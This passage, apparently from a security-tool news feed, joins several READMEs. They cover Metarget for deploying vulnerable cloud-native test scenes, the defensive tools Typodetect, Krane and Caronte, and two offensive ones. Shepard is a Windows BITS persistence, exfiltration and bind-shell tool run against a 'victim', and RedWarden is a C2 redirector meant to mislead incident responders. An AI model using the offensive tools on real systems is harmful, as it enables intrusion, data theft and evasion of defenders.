-h, --help show this help message and exit

2.2.1 Case: Install Docker with Specified Version

Run:

./metarget gadget install docker --version 18.03.1

If the command above completes successfully, Docker 18.03.1 will be installed.


2.2.2 Case: Install Kubernetes with Specified Version

Run:

./metarget gadget install k8s --version 1.16.5

If the command above completes successfully, a single-node Kubernetes 1.16.5 cluster will be installed.

Note:

Usually, lots of options need to be configured in Kubernetes. As a security research project, Metarget provides some options for installation of Kubernetes:

  -v VERSION, --version VERSION
gadget version
--cni-plugin CNI_PLUGIN
cni plugin, flannel by default
--pod-network-cidr POD_NETWORK_CIDR
pod network cidr, default cidr for each plugin by
default
--taint-master taint master node or not

Metarget supports deployment of a multi-node cluster. If you want to add more nodes to the cluster, you can copy the tools/install_k8s_worker.sh script and run it on each worker node after the successful installation of the single-node cluster.


2.2.3 Case: Install Kata-containers with Specified Version

Run:

./metarget gadget install kata --version 1.10.0

If the command above completes successfully, Kata-containers 1.10.0 will be installed.

Note:

You can also specify the type of kata runtime (qemu/clh/fc/...) with --kata-runtime-type option, which is qemu by default.


2.2.4 Case: Install Linux Kernel with Specified Version

Run:

./metarget gadget install kernel --version 5.7.5

If the command above completes successfully, kernel 5.7.5 will be installed.

Note:

Currently, Metarget installs kernels in 2 ways (a rough sketch follows the list):

  1. apt
  2. if the apt package is not available, download the *.deb remotely from Ubuntu and try to install it
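
A Python sketch of that apt-first, .deb-fallback logic (the package name and download URL patterns are illustrative assumptions, not Metarget's actual sources):

import subprocess
import urllib.request

def install_kernel(version):
    package = f"linux-image-{version}-generic"  # illustrative package name
    # 1. try apt first
    if subprocess.run(["apt-get", "install", "-y", package]).returncode == 0:
        return
    # 2. fall back to fetching a .deb remotely (URL pattern is illustrative)
    deb = f"linux-image-{version}.deb"
    url = f"https://kernel.ubuntu.com/~kernel-ppa/mainline/v{version}/{deb}"
    urllib.request.urlretrieve(url, deb)
    subprocess.run(["dpkg", "-i", deb], check=True)

install_kernel("5.7.5")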

After a successful kernel installation, a system reboot is needed. Metarget will prompt for the reboot automatically.


2.3 Manage Vulnerable Scenes Related to Cloud Native Components
usage: metarget cnv [-h] subcommand ...

positional arguments:
subcommand description
list list supported cloud native vulnerabilities
install install cloud native vulnerabilities
remove uninstall cloud native vulnerabilities

optional arguments:
-h, --help show this help message and exit

Run ./metarget cnv list to see vulnerable scenes related to cloud native components supported currently.


2.3.1 Case: CVE-2019-5736

Run:

./metarget cnv install cve-2019-5736

If the command above completes successfully, Docker with CVE-2019-5736 will be installed.


2.3.2 Case: CVE-2018-1002105

Run:

./metarget cnv install cve-2018-1002105

If the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed.


2.3.3 Case: Kata-containers Escape

Run:

./metarget cnv install kata-escape-2020

If the command above completes successfully, Kata-containers with CVE-2020-2023/2025/2026 will be installed.


2.3.4 Case: CVE-2016-5195

Run:

./metarget cnv install cve-2016-5195

If the command above completes successfully, a kernel with CVE-2016-5195 will be installed.


2.4 Manage Vulnerable Scenes Related to Cloud Native Applications
usage: metarget appv [-h] subcommand ...

positional arguments:
subcommand description
list list supported application vulnerabilities
install install application vulnerabilities
remove uninstall application vulnerabilities

optional arguments:
-h, --help show this help message and exit

Run ./metarget appv list to see vulnerable scenes related to cloud native applications supported currently.

Note:

Before deploying application vulnerable scenes, you should first install Docker and Kubernetes; you can use Metarget to install both.


2.4.1 Case: DVWA

Run:

./metarget appv install dvwa

If the command above completes successfully, DVWA will be deployed as Deployment and Service resources in the current Kubernetes cluster.

Note:

You can specify the --external option; the service will then be exposed as NodePort, so that you can visit it via the IP of the host node.

By default, the type of service is ClusterIP.


2.5 Manage Vulnerable Cloud Native Target Cluster

Developing, currently not supported.


3 Installation

3.1 Requirements
  • Ubuntu 16.04 or 18.04
  • Python >= 3.5
  • pip3

3.2 From Source

Clone the repository and install requirements:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt

Begin to use Metarget and construct vulnerable scenes. For example:

./metarget cnv install cve-2019-5736

3.3 From PyPI

Currently unsupported.


4 Scene List

4.1 Vulnerable Scenes Related to Cloud Native Components
Name                            Class              Type                   CVSS 3.x
cve-2018-15664                  docker             container_escape       7.5
cve-2019-13139                  docker             command_execution      8.4
cve-2019-14271                  docker             container_escape       9.8
cve-2020-15257                  docker/containerd  container_escape       5.2
cve-2019-5736                   docker/runc        container_escape       8.6
cve-2017-1002101                kubernetes         container_escape       9.6
cve-2018-1002105                kubernetes         privilege_escalation   9.8
cve-2019-11253                  kubernetes         denial_of_service      7.5
cve-2019-9512                   kubernetes         denial_of_service      7.5
cve-2019-9514                   kubernetes         denial_of_service      7.5
cve-2020-8554                   kubernetes         man_in_the_middle      5.0
cve-2020-8557                   kubernetes         denial_of_service      5.5
cve-2020-8558                   kubernetes         exposure_of_service    8.8
cve-2016-5195                   kernel             container_escape       7.8
cve-2018-18955                  kernel             privilege_escalation   7.0
cve-2020-14386                  kernel             container_escape       7.8
cap_dac_read_search-container   config             container_escape       -
cap_sys_admin-container         config             container_escape       -
cap_sys_ptrace-container        config             container_escape       -
privileged-container            config             container_escape       -
mount-docker-sock               mount              container_escape       -
mount-host-etc                  mount              container_escape       -
mount-host-procfs               mount              container_escape       -
kata-escape-2020                kata-containers    container_escape       6.3/8.8/8.8

4.2 Vulnerable Scenes Related to Cloud Native Applications

These scenes are mainly derived from other open-source projects:

We express sincere gratitude to projects above!

Metarget converts scenes in the projects above to Deployment and Service resources in Kubernetes (thanks to kompose).

To list vulnerable scenes related to cloud native applications supported by Metarget, just run:

./metarget appv list

5 DEMO


6 Development Plan
  • deployments of basic cloud native components (docker, k8s)
  • integrations of vulnerable scenes related to cloud native components
  • integrations of RCE scenes in containers
  • automatic construction of multi-node cloud native target cluster
  • integrations of other cloud native vulnerable scenes (long term)

7 Maintainers

8 About Logo

It is not a Kubernetes, but a vulnerable infrastructure with three gears which could not work well (vulnerable) :)



Shepard - In Progress Persistent Download/Upload/Execution Tool Using Windows BITS



This is an IN PROGRESS persistence tool using the Windows Background Intelligent Transfer Service (BITS).

Functionality: File Download, File Exfiltration, File Download + Persistent Execution

Usage: run shepard.exe as Administrator with the following command line arguments:

-d remoteLocation, writePath: regular file download to a local path of your choice

-e remoteLocation, localPath: regular file upload from a local path of your choice (only sends to an IIS server; this is a limitation of BITS)

-dr remoteLocation, writePath, [optionalFileArgs]: file download to a path of your choice that will attempt to maintain persistence. The downloaded file will attempt to run with optionalFileArgs, and BITS will check back every 30 seconds to make sure the file is still running on the compromised system.

Running this executable with no arguments or an incorrect number of arguments will cause Shepard to exit cleanly.


BINDSHELL

The server (victim) is written using C#. It listens on port 6006.

Usage: run shepardsbind_serv.exe with no arguments.

The client (attacker) is written in Python and takes one argument: the IP address of the victim's machine. Usage: run shepardsbind_recv.py <victim's IP>.

Running shepardsbind_recv.py with no arguments will return an error. The prompt will look like: %SBS%


Using them in conjunction

The only executable that must be on the victim's machine is shepard.exe. Host the bindshell executable in a publicly accessible place; Shepard will download and run it, and the user can then use the Python receiver. If the shell is found and killed, it will restart after 30 seconds. Last steps in progress: finding out how to rerun shepard.exe to redownload in case the shell executable is deleted. Most likely this will use a service.



Typodetect - Detect The Active Mutations Of Domains



This tool gives blue teams, SOCs, researchers and companies the ability to detect the active mutations of their domains, thus preventing the use of these domains in fraudulent activities such as phishing and smishing.

For this, Typodetect uses the latest available version of the TLDs (Top Level Domains) published on the IANA website, validates decentralized domains in Blockchain DNS and checks malware reports in DoH (DNS over HTTPS) services.

For ease of use, Typodetect delivers the report in JSON format by default or in TXT format, as the user selects, and shows on screen a summary of the mutations generated, the active domains, and the domains reported as malware or detected as decentralized.
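
The overall pipeline (generate mutations, resolve them, classify the live ones) can be sketched briefly in Python; the mutation set below is a small illustrative subset of what the tool generates:

import socket

def mutations(domain):
    """Yield a few simple typo mutations: omission, repetition, adjacent swap."""
    name, tld = domain.rsplit(".", 1)
    for i in range(len(name)):
        yield f"{name[:i]}{name[i+1:]}.{tld}"         # character omission
        yield f"{name[:i]}{name[i]}{name[i:]}.{tld}"  # character repetition
    for i in range(len(name) - 1):
        yield f"{name[:i]}{name[i+1]}{name[i]}{name[i+2:]}.{tld}"  # adjacent swap

for candidate in sorted(set(mutations("example.com"))):
    try:
        ip = socket.gethostbyname(candidate)  # an "active" mutation resolves in DNS
        print(f"{candidate} -> {ip}")
    except socket.gaierror:
        pass                                  # inactive mutation, skip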


Installation

Clone this repository with:

git clone https://github.com/Telefonica/typodetect

Install the requirements:

python3 -m pip install -r requirements.txt

Running TypoDetect

Inside the TypoDetect directory:

python3 typodetect.py -h
usage: typodetect.py [-h] [-u UPDATE] [-t N_THREADS] [-d DOH_SERVER] [-o OUTPUT] domain

positional arguments:
domain specify domain to process

optional arguments:
-h, --help show this help message and exit
-u UPDATE, --update UPDATE
(Y/N) for update TLD's database (default:N)
-t N_THREADS, --threads N_THREADS
Number of threads for processing (default:5)
-d DOH_SERVER, --doh DOH_SERVER
Section DoH for use: [1] ElevenPaths (default) [2] Cloudflare
-o OUTPUT, --output OUTPUT
JSON or TXT, options of filetype (default:JSON)

For a simple analysis:

python3 typodetect.py <domain>

To update the IANA database and analyze:

python3 typodetect.py -u y <domain>

To run the analysis with more threads:

python3 typodetect.py -t <number of threads> <domain>

To use a different DoH provider (currently only ElevenPaths or Cloudflare):

python3 typodetect.py -d 2 <domain>

To create a TXT report:

python3 typodetect.py -o TXT <domain>

Reports

Inside the reports directory, the report file is saved, by default in JSON, with the name of the analyzed domain and the date, for example:

elevenpaths.com2021-01-26T18:20:10.34568.json

The JSON report has the following structure for each active mutation detected:

{ id:
  "report_DoH": <string>,
  "domain": <string>,
  "A": [ip1, ip2, ...],
  "MX": [mx1, mx2, ...]
}

The fields contain the following information:

id: integer id of the mutation
"report_DoH": one of:
  "" - domain uses decentralized DNS
  "Malware" - domain reported as dangerous by the DoH service
  "Good" - domain reported as good by the DoH service
"domain": the mutation detected as active.
"A": IP addresses of the A records in the mutation's DNS.
"MX": IPs or CNAMEs of the MX records in the mutation's DNS.


Krane - Kubernetes RBAC Static Analysis And Visualisation Tool



Krane is a simple Kubernetes RBAC static analysis tool. It identifies potential security risks in K8s RBAC design and makes suggestions on how to mitigate them. The Krane dashboard presents the current RBAC security posture and lets you navigate through its definition.


Features
  • RBAC Risk rules - Krane evaluates a set of built-in RBAC risk rules. These can be modified or extended with a set of custom rules.
  • Portability - Krane can run in one of the following modes:
    • Locally as a CLI or docker container.
    • In CI/CD pipelines as a step action detecting potential RBAC flaws before it gets applied to the cluster.
    • As a standalone service continuously analysing state of RBAC within a Kubernetes cluster.
  • Reporting - Krane produces an easy to understand RBAC risk report in machine-readable format.
  • Dashboard - Krane comes with a simple dashboard UI helping you understand in-cluster RBAC design. The dashboard presents a high-level overview of the RBAC security posture and highlights detected risks. It also allows further inspection of RBAC controls via faceted tree and graph network views.
  • Alerting - It will alert on detected medium and high severity risks via its Slack integration.
  • RBAC in the Graph - Krane indexes the entirety of Kubernetes RBAC in a local graph database, which makes any further ad-hoc interrogation of RBAC data easy with arbitrary CypherQL queries.

Local Quick Start

Get started locally with Docker Compose.


Prerequisites

It is assumed that you have docker running on your local machine. Install docker-compose if you haven't already.


Run Krane locally

Krane depends on RedisGraph. The docker-compose stack defines everything required to build and run the Krane service locally; it will also take care of the RedisGraph dependency.

docker-compose up -d

The Krane docker image will be pre-built automatically if it's not already present on the local machine.

Note that when running docker-compose locally, Krane won't start the RBAC report and dashboard automatically. Instead, the container will sleep for 24h by default; this value can be adjusted in docker-compose.override.yml. Exec into the running Krane container to run commands. Local docker-compose will also mount your kube config (~/.kube/config) inside the container, enabling you to run reports against any Kubernetes clusters to which you already have access.

# Exec into a running Krane container

docker-compose exec krane bash

# Once in the container you can start using `krane` commands. Try `krane -help`.

$ krane -h

To inspect what services are running and the associated ports:

docker-compose ps

To stop Krane and its dependency services:

docker-compose down

Usage Guide

Commands
$ krane --help

NAME:

krane

DESCRIPTION:

Kubernetes RBAC static analysis & visualisation tool

COMMANDS:

dashboard Start K8s RBAC dashboard server
help Display global or [command] help documentation
report Run K8s RBAC report

GLOBAL OPTIONS:

-h, --help
Display help documentation

-v, --version
Display version information

-t, --trace
Display backtrace when an error occurs

AUTHOR:

Marcin Ciszak <marcin.ciszak@appvia.io> - Appvia Ltd <appvia.io>

Generate RBAC report

With local kubectl context

To run a report against a running cluster you must provide a kubectl context:

krane report -k <context>

You may also pass the -c <cluster-name> flag if you plan to run the tool against multiple clusters and index the RBAC graph separately for each cluster name.


From RBAC files stored in directory

To run a report against local RBAC yaml/json files, provide a directory path:

krane report -d </path/to/rbac-directory>

NOTE: Krane expects the following files (in either YAML or JSON format) to be present in specified directory path:

  • psp
  • roles
  • clusterroles
  • rolebindings
  • clusterrolebindings

Inside a Kubernetes cluster

To run a report from a container running in a Kubernetes cluster:

krane report --incluster

NOTE: The service account used by Krane requires access to RBAC resources. See Prerequisites for details.


In CI/CD pipeline

To validate an RBAC definition as a step in a CI/CD pipeline:

krane report --ci -d </path/to/rbac-directory>

NOTE: Krane expects a certain naming convention to be followed for locally stored RBAC resource files; see the section above. In order to run krane commands, it's recommended that the CI executor references the quay.io/appvia/krane:latest docker image.

CI mode is enabled by the --ci flag. Krane will return a non-zero status code, along with details of the breached risk rules, when one or more dangers have been detected.


Visualisation Dashboard

To view the RBAC facets tree, the network graph and the latest report findings, you need to start the dashboard server first.

krane dashboard

The cluster flag -c <cluster-name> may be passed if you want to run the dashboard against a specific cluster name. The dashboard will look for data related to the specified cluster name, which is cached on the file system.

The command above will start a local web server on the default port 8000 and display the dashboard link.


Architecture

RBAC Data indexed in a local Graph database

Krane indexes RBAC entities in RedisGraph. This allows us to query the network of dependencies efficiently and simply, using the subset of CypherQL supported by RedisGraph.


Schema



Nodes

The following nodes are created in the Graph for the relevant RBAC objects:

  • Psp - A PSP node containing attributes around the pod security policy.
  • Rule - Rule node represents access control rule around Kubernetes resources.
  • Role - Role node represents a given Role or ClusterRole. kind attribute defines type of role.
  • Subject - Subject represents all possible actors in the cluster (kind: User, Group and ServiceAccount)
  • Namespace - Kubernetes Namespace node.

Edges
  • :SECURITY - Defines a link between Rule and Psp nodes.
  • :GRANT - Defines a link between Role and Rule associated with that role.
  • :ASSIGN - Defines a link between an Actor (Subject) and given Role/ClusterRole (Role node).
  • :RELATION - Defines a link between two different Actor (Subject) nodes.
  • :SCOPE - Defines a link between Role and Namespace nodes.
  • :ACCESS - Defines a link between Subject and Namespace nodes.
  • :AGGREGATE - Defines a link between ClusterRoles (one ClusterRole aggregates another) A-(aggregates)->B
  • :COMPOSITE - Defines a link between ClusterRoles (one ClusterRole can be aggregated in another) A<-(is a composite of)-B

All edges are bidirectional, which means the graph can be queried in either direction. The only exceptions are the :AGGREGATE and :COMPOSITE relations, which are uni-directional, though concerned with the same edge nodes.


Querying the Graph

In order to query the graph directly you can exec into a running redisgraph container, start redis-cli and run your arbitrary queries. Follow official instructions for examples of commands.

You can also query the Graph from Krane console. First exec into running Krane container, then

# Start Krane console - this will open interactive ruby shell with Krane code preloaded

console

# Instantiate Graph client

graph = Krane::Clients::RedisGraph.client cluster: 'default'

# Run arbitrary CypherQL query against indexed RBAC Graph

res = graph.query(%Q(
MATCH (r:Rule {resource: "configmaps", verb: "update"})<-[:GRANT]-(ro:Role)<-[:ASSIGN]-(s:Subject)
RETURN s.kind as subject_kind, s.name as subject_name, ro.kind as role_kind, ro.name as role_name))

# Print the results

res.print_resultset
# Results...
+----------------+--------------------------------+-----------+------------------------------------------------+
| subject_kind | subject_name | role_kind | role_name |
+----------------+--------------------------------+-----------+------------------------------------------------+
| ServiceAccount | bootstrap-signer | Role | system:controller:bootstrap-signer |
| User | system:kube-controller-manager | Role | system::leader-locking-kube-controller-manager |
| ServiceAccount | kube-controller-manager | Role | system::leader-locking-kube-controller-manager |
| User | system:kube-scheduler | Role | system::leader-locking-kube-scheduler |
| ServiceAccount | kube-scheduler | Role | system::leader-locking-kube-scheduler |
+----------------+--------------------------------+-----------+------------------------------------------------+

Note: Example query above will select all Subjects with assigned Roles/ClusterRoles granting access to update configmaps.


Configuration

RBAC Risk Rules

RBAC risk rules are defined in the Rules file. The structure of each rule is largely self-explanatory. The built-in set can be expanded or overridden by adding extra custom rules to the Custom Rules file.


Risk Rule Macros

Macros are "containers" for a set of common/shared attributes, referenced by one or more risk rules. If you choose to use a macro in a given risk rule, you reference it by name, e.g. macro: <macro-name>. Note that attributes defined in the referenced macro take precedence over the same attributes defined at the rule level.

Macro can contain any of the following attributes:

  • query - RedisGraph query. Has precedence over template. Requires writer to be defined.
  • writer - Writer is a Ruby expression used to format query result set. Writer has precedence over template.
  • template - Built-in query/writer template name. If query & writer are not specified, then the chosen query generator will be used along with a matching writer.

Risk Rule attributes

Rule can contain any of the following attributes:

  • id [Required] Rule id is a unique rule identifier.

  • group_title [Required] Title applying to all items falling under this risk check.

  • severity [Required] Severity, as one of :danger, :warning, :info.

  • info [Required] Textual information about the check and suggestions on how to mitigate the risk.

  • query [Conditional] RedisGraph query.

    • Has precedence over template. Requires writer to be defined.
  • writer [Conditional] Writer is a Ruby expression used to format the query result set.

    • Writer has precedence over template. Requires query to be defined.
  • template [Conditional] Built-in query/writer template name. If query & writer are not specified, then the chosen query generator will be used along with a matching writer.

    • Some built-in templates require match_rules attribute to be specified on individual rule level in order to build correct query. Templates currently requiring it:

      • risky-role - Builds multi-match graph query based on the access rules specified by match_rules. Generated graph query returns the following columns:
        • role_name
        • role_kind
        • namespace_name (an array is returned if multiple items returned)
  • match_rules [Conditional] Required when the template relies on match rules in order to build a query.

  • custom_params [Optional] List of custom key-value pairs to be evaluated and replaced in a rule query and writer representation.

    • Example:
      custom_params:
      - attrA: valueA
      - attrB: valueB
      Template placeholders for the keys above {{attrA}} and {{attrB}} will be replaced with valueA and valueB respectively.
  • threshold [Optional] Numeric value. When defined, this becomes available as the template placeholder {{threshold}} in the writer expression.

  • macro [Optional] Reference to common parameters defined in a named macro.

  • disabled [Optional] When set to true, it disables the given rule and excludes it from evaluation. By default all rules are enabled.


Risk Rule examples

Explicit query & writer expression
- id: verbose-rule-example
  group_title: Example rule
  severity: :danger
  info: Risk description and instructions on how to mitigate it go here
  query: |
    MATCH
      (s:Subject)-[:ACCESS]->(ns:Namespace)
    WHERE
      NOT s.name IN {{whitelist_subject_names}}
    RETURN
      s.kind as subject_kind,
      s.name as subject_name,
      COLLECT(ns.name) as namespace_names
    ORDER BY
      subject_kind,
      subject_name,
      namespace_names DESC
  threshold: 2
  writer: |
    if result.namespace_names.count > {{threshold}}
      "#{result.subject_kind} #{result.subject_name} can access namespaces: #{result.namespace_names.join(', ')}"
    end
  disabled: true

The example above explicitly defines a graph query which is used to evaluate RBAC risk, and a writer expression used to format the query result set. The query simply selects all Subjects (excluding whitelisted ones) and the Namespaces to which they have access. Note that the result set will only include Subjects having access to more than 2 Namespaces (notice the threshold value there?). The writer's last expression will be captured as the formatted result item output.

writer can access the result set item via result object with methods matching elements returned by the query, e.g. result.subject_kind, result.subject_name etc.

Note:

  • {{threshold}} placeholder in the writer expression will be replaced by the rule's threshold keyword value.
  • {{whitelist_subject_names}} represents a custom field which will be interpolated with Whitelist values defined for a given rule id. If a placeholder field name is not defined in the whitelist it'll be substituted with an empty array [''] by default. Read more on whitelisting below.

Templated Risk Rule

Built-in templates simplify risk rule definitions significantly; however, they are designed to extract a specific kind of information and may not be a good fit for your custom rules. If you find yourself reusing the same query or writer expressions across multiple rules, consider extracting those into a macro and referencing it in your custom rules to DRY them up.

- id: risky-any-verb-secrets
  group_title: Risky Roles/ClusterRoles allowing all actions on secrets
  severity: :danger
  info: Roles/ClusterRoles allowing all actions on secrets. This might be dangerous. Review listed Roles!
  template: risky-role
  match_rules:
    - resources: ['secrets']
      verbs: ['*']

The example above shows one of the built-in rules. It references the risky-role template which, upon processing, will expand the rule by injecting query and writer expressions before rule evaluation triggers. match_rules will be used to build the appropriate match query.


RBAC Risk Whitelist

Optional whitelist contains a set of custom defined attribute names and respective (whitelisted) values.


Whitelist attributes

Attribute names and their values are arbitrary. They are defined in the Whitelist file and divided into three separate sections:

  • global - Top level scope. Custom attributes defined here will apply to all Risk Rules regardless of the cluster name.
  • common - Custom attributes will be scoped to specific Risk Rule id regardless of the cluster name.
  • cluster (with nested list of cluster names) - Custom attributes will apply to specific Risk Rule id for a given cluster name.

Each Risk Rule, upon evaluation, will attempt to interpolate all parameter placeholders used in the query, e.g. {{your_whitelist_attribute_name}}. If a placeholder parameter name (i.e. a name between the double curly brackets) matches any of the whitelisted attribute names for that Risk Rule id, it will be replaced with its calculated value. If no values are found for a given placeholder, it'll be substituted with [''].


Whitelist examples

The example whitelist below produces the following placeholder-key => value mapping for a Risk Rule whose id attribute matches "some-risk-rule-id":

{{whitelist_role_names}}    => ['acp:prometheus:operator']
{{whitelist_subject_names}} => ['privileged-psp-user', 'another-user']

The placeholder keys above, when used in the custom graph queries, will be replaced by their respective values upon Risk Rule evaluation.

Example:

---
rules:
  global:                        # global scope - applies to all risk rules and cluster names
    whitelist_role_names:        # custom attribute name
      - acp:prometheus:operator  # custom attribute values

  common:                        # common scope - applies to a specific risk rule id regardless of cluster name
    some-risk-rule-id:           # this corresponds to a risk rule id defined in config/rules.yaml
      whitelist_subject_names:   # custom attribute name
        - privileged-psp-user    # custom attribute values

  cluster:                       # cluster scope - applies to a specific risk rule id and cluster name
    default:                     # example cluster name
      some-risk-rule-id:         # risk rule id
        whitelist_subject_names: # custom attribute name
          - another-user         # custom attribute values

Kubernetes Deployment

Krane can be deployed to a local or remote Kubernetes cluster easily.


K8s Prerequisites

Kubernetes namespace, service account along with appropriate RBAC must be present in the cluster. See the Prerequisites for reference.

Default Krane entrypoint executes bin/in-cluster-run which waits for RedisGraph instance to become available before starting RBAC report loop and dashboard web server.

You may control certain aspects of in-cluster execution with the following environment variables:

  • KRANE_REPORT_INTERVAL - Defines interval in seconds for RBAC static analysis report run. Default: 300 (in seconds, i.e. 5 minutes).
  • KRANE_REPORT_OUTPUT - Defines RBAC risk report output format. Possible values :json, :yaml, :none. Default: :json.
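For example, to run the report every 10 minutes with JSON output, these could be set on the Krane container in its deployment manifest (a sketch only; the surrounding manifest layout and the exact value formatting are assumptions):

# excerpt from a hypothetical Krane deployment manifest
containers:
  - name: krane
    image: quay.io/appvia/krane:latest
    env:
      - name: KRANE_REPORT_INTERVAL
        value: "600"     # report every 10 minutes
      - name: KRANE_REPORT_OUTPUT
        value: ":json"   # documented values: :json, :yaml, :none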

Local or Remote K8s Cluster

If your K8s cluster comes with built-in Compose-on-Kubernetes controller support (docker-desktop supports it by default), then you can deploy Krane and its dependencies with a single docker stack command:

docker stack deploy \
--orchestrator kubernetes \
--namespace krane \
--compose-file docker-compose.yml \
--compose-file docker-compose.k8s.yml krane

Note: Make sure your current kube context is set correctly prior to running the command above!

The application Stack should now be deployed to the Kubernetes cluster with all services ready and exposed. Note that Krane will automatically start its report loop and dashboard server.

$ docker stack services --orchestrator kubernetes --namespace krane krane

ID NAME MODE REPLICAS IMAGE PORTS
0de30651-dd5 krane_redisgraph replicated 1/1 redislabs/redisgraph:1.99.7 *:6379->6379/tcp
aa377a5f-62b krane_krane replicated 1/1 quay.io/appvia/krane:latest *:8000->8000/tcp

Check your Kubernetes cluster RBAC security posture by visiting

http://localhost:8000

Note that for remote cluster deployments you'll likely need to port-forward the Krane service first:

kubectl --context=my-remote-cluster --namespace=krane port-forward svc/krane 8000

To delete the Stack:

docker stack rm krane \
--orchestrator kubernetes \
--namespace krane

Alternatively, deploy with kubectl:

kubectl create \
--context docker-desktop \
--namespace krane \
-f k8s/redisgraph-service.yaml \
-f k8s/redisgraph-deployment.yaml \
-f k8s/krane-service.yaml \
-f k8s/krane-deployment.yaml

Note that Krane dashboard services are not exposed by default!

kubectl port-forward svc/krane 8000 \
--context=docker-desktop \
--namespace=krane

# Open Krane dashboard

http://localhost:8000

You can find the example deployment manifests in k8s directory.

Modify the manifests as required for your deployments, making sure you reference the correct version of the Krane docker image in its deployment file. See the Krane Docker Registry for available tags, or just use latest.


Notifications

Krane will notify you about detected anomalies of medium and high severity via its Slack integration.

To enable notifications, specify the Slack webhook_url & channel in the config/config.yaml file, or alternatively set both the SLACK_WEBHOOK_URL and SLACK_CHANNEL environment variables. Environment variables take precedence over config file values.
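The relevant config/config.yaml keys might look like the sketch below (the exact key layout is an assumption; the webhook URL and channel are placeholders):

# hypothetical config/config.yaml excerpt
slack:
  webhook_url: https://hooks.slack.com/services/T0000/B0000/XXXXXXXX
  channel: '#krane-alerts'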


Local Development

This section describes steps to enable local development.


Setup

Install Krane code dependencies with

./bin/setup

Dependencies

Krane depends on RedisGraph. docker-compose is the quickest way to get Krane's dependencies running locally.

docker-compose up -d redisgraph

To check that the RedisGraph service is up:

docker-compose ps

To stop services:

docker-compose down

Development

At this point you should be able to modify the Krane codebase and test the results by invoking commands in a local shell.

./bin/krane --help                    # to get help
./bin/krane report -k docker-desktop  # to generate your first report for the
                                      # local docker-desktop k8s cluster
...

To enable Dashboard UI local development mode

cd dashboard
npm install
npm start

This will automatically start the Dashboard server, open the default browser and watch for source file changes.

Krane comes preconfigured with Skaffold for an improved developer experience. Iterating on the project and validating the application by running the entire stack in a local or remote Kubernetes cluster just got easier. Code hot-reload enables local changes to be automatically propagated to the running container for a faster development lifecycle.

skaffold dev --kube-context docker-desktop --namespace krane --port-forward

Tests

Run tests locally with

bundle exec rspec

Contributing to Krane

We welcome any contributions from the community! Have a look at our contribution guide for more information on how to get started. If you use Krane, find it useful, or are generally interested in Kubernetes security then please let us know by Starring and Watching this repo. Thanks!


Community

//TODO


Roadmap

See our Roadmap for details about our plans for the project.



Caronte - A Tool To Analyze The Network Flow During Attack/Defence Capture The Flag Competitions



Caronte is a tool to analyze the network flow during capture the flag events of type attack/defence. It reassembles TCP packets captured in pcap files to rebuild TCP connections, and analyzes each connection to find user-defined patterns. The patterns can be defined as regex or using protocol-specific rules. The connection flows are saved into a database and can be visualized with the web application. A REST API is also provided.


Features
  • immediate installation with docker-compose
  • no configuration file, settings can be changed via GUI or API
  • pcaps to be analyzed can be loaded via curl, either locally or remotely, or via the GUI
    • it is also possible to download the pcaps from the GUI and see all the analysis statistics for each pcap
  • rules can be created to identify connections that contain certain strings
    • pattern matching is done through regular expressions (regex)
    • regex in UTF-8 and Unicode format are also supported
  • connections can be labeled by type of service, identified by the port number
    • each service can be assigned a different color
  • ability to filter connections by addresses, ports, size, time, duration, matched rules
  • a timeline shows statistics with different metrics sampled per minute
    • some of these metrics are connections_per_service, client_bytes_per_service, server_bytes_per_service, duration_per_service, matched_rules
      • with the matched_rules metric it is possible to see the relationship between flag_in and flag_out
    • the timeline contains a sliding window which can be used to search for connections in a certain time interval
  • advanced search by term, negated term, exact phrase, regex, negated regex
    • performed searches are saved so they can be instantly repeated later
  • the detected HTTP connections are automatically reconstructed
    • HTTP requests can be replicated through curl, fetch and python requests
    • compressed HTTP responses (gzip/deflate) are automatically decompressed
  • ability to export and view the content of connections in various formats, including hex and base64
  • JSON content is displayed in a JSON tree viewer, HTML code can be rendered in a separate window
  • occurrences of matched rules are highlighted in the connection content view
  • supports both IPv4 and IPv6 addresses
    • if more addresses are assigned to the vulnerable machine to be defended, a CIDR address can be used

Installation

There are two ways to install Caronte:

  • with Docker and docker-compose, the fastest and easiest way
  • manually installing dependencies and compiling the project

Run with Docker

The only things to do are:

  • clone the repo, with git clone https://github.com/eciavatta/caronte.git
  • inside the caronte folder, run docker-compose up -d
  • wait for the image to be built and open a browser at http://localhost:3333

Manual installation

The first thing to do is to install the dependencies:

Next you need to compile the project, which is composed of two parts:

  • the backend, which can be compiled with go mod download && go build
  • the frontend, which can be compiled with cd frontend && yarn install && yarn build

Before running Caronte, start an instance of MongoDB (https://docs.mongodb.com/manual/administration/install-community/); note that it has no authentication. Be careful not to expose the MongoDB port on the public interface.

Run the binary with ./caronte. The available configuration options are:

-bind-address    address where server is bind (default "0.0.0.0")
-bind-port       port where server is bind (default 3333)
-db-name         name of database to use (default "caronte")
-mongo-host      address of MongoDB (default "localhost")
-mongo-port      port of MongoDB (default 27017)

Configuration

The configuration takes place at runtime on the first start, via the graphical interface or via the API. It is necessary to set up:

  • the server_address: the IP address of the vulnerable machine. It must be the destination address of all the connections in the pcaps. If each vulnerable service has its own IP, this param also accepts a CIDR address. The address can be either IPv4 or IPv6
  • the flag_regex: the regular expression that matches a flag. Usually provided on the competition rules page
  • auth_required: if true a basic authentication is enabled to protect the analyzer
  • an optional accounts array, which contains the credentials of authorized users
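Putting those fields together, the initial settings could look something like the sketch below. The field names come from the list above, but the payload shape (including the structure of each accounts entry) is an assumption for illustration only:

{
  "server_address": "10.60.0.1/32",
  "flag_regex": "[A-Z0-9]{31}=",
  "auth_required": true,
  "accounts": [
    { "username": "admin", "password": "changeme" }
  ]
}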

Documentation

The backend, written in Go, is designed as a service. It exposes a REST API that is used by the frontend, written in React. The list of available APIs with their explanation is available here: https://app.swaggerhub.com/apis-docs/eciavatta/caronte/WIP


Screenshots

Below are some screenshots showing the main features of the tool.


Main window, with connections list and stream content


Main window, with the timeline expanded


Rules and services view


Searches and pcaps view

RedWarden - Flexible CobaltStrike Malleable Redirector



RedWarden - Flexible CobaltStrike Malleable Redirector

(previously known as proxy2'smalleable_redirector plugin)

Let's raise the bar in C2 redirectors IR resiliency, shall we?


The Red Teaming business has seen several different great ideas on how to combat incident responders and misdirect them, while offering a resistant C2 redirectors network at the same time.

This work combines many of those great ideas into one lightweight utility, mimicking Apache2 in its roots of being a simple HTTP(S) reverse-proxy.

Combining Malleable C2 profile understanding, knowledge of bad IP address pools and the flexibility to easily add new inspection and misrouting logic resulted in a crafty repellent for IR inspections.



